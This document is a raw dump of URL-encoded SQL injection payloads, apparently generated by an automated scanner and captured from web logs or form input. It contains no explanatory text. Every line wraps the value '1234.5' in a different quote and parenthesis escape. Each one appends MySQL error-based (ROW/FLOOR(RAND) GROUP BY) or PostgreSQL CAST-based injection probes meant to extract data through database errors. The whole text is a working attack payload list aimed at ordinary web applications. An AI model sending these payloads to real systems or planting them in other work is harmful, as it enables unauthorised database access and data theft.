1234.5%29%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%282611%3D2611 1234.5%29%29%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%28%289548%3D9548 1234.5%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29 1234.5%27%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%27OHip%27%3D%27OHip 1234.5%27%29%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27cWiq%27%3D%27cWiq 1234.5%27%29%29%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27jeYp%27%3D%27jeYp 1234.5%27%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%27QkDE%27%3D%27QkDE 1234.5%27%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%27tDdp%27%20LIKE%20%27tDdp 1234.5%27%29%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27VpBg%27%20LIKE%20%27VpBg 1234.5%27%29%29%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27zfHT%27%20LIKE%20%27zfHT 1234.5%27%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%27lQlI%27%20LIKE%20%27lQlI 1234.5%22%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%22AvDd%22%3D%22AvDd 1234.5%22%29%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%28%22BimJ%22%3D%22BimJ 1234.5%22%29%29%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%22camz%22%3D%22camz 1234.5%22%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%22vEPC%22%3D%22vEPC 1234.5%22%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%22Ylxv%22%20LIKE%20%22Ylxv 1234.5%22%29%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%28%22hdTl%22%20LIKE%20%22hdTl 1234.5%22%29%29%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%22TSOc%22%20LIKE%20%22TSOc 1234.5%22%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%22rebs%22%20LIKE%20%22rebs 1234.5%25%27%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%28%27jgls%27%3D%27jgls 1234.5%00%27%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%27YNPA%27%3D%27YNPA 1234.5%27%29%20WHERE%202379%3D2379%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20--%20 1234.5%22%29%20WHERE%204991%3D4991%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20--%20 1234.5%29%20WHERE%204682%3D4682%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20--%20 1234.5%27%20WHERE%209606%3D9606%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20--%20 1234.5%22%20WHERE%202834%3D2834%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20--%20 1234.5%20WHERE%208151%3D8151%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27ClUT%27%20FROM%20DUAL%20WHERE%207006%3D7006%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27htIj%27%20WHERE%206794%3D6794%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20wqnt%20WHERE%207893%3D7893%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27wAmo%27%20WHERE%201778%3D1778%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20%23 1234.5%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 1234.5%27%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 1234.5%27%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 1234.5%22%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 1234.5%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%281286%3D1286 1234.5%29%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%282568%3D2568 1234.5%29%29%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%282693%3D2693 1234.5%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 1234.5%27%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27Vmny%27%3D%27Vmny 1234.5%27%29%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27ikDc%27%3D%27ikDc 1234.5%27%29%29%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27lKcR%27%3D%27lKcR 1234.5%27%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27zwnk%27%3D%27zwnk 1234.5%27%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27FntI%27%20LIKE%20%27FntI 1234.5%27%29%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27RhSz%27%20LIKE%20%27RhSz 1234.5%27%29%29%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27MPTu%27%20LIKE%20%27MPTu 1234.5%27%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27xAWf%27%20LIKE%20%27xAWf 1234.5%22%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%22dlsc%22%3D%22dlsc 1234.5%22%29%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%22nYkZ%22%3D%22nYkZ 1234.5%22%29%29%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22adJE%22%3D%22adJE 1234.5%22%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%22onjG%22%3D%22onjG 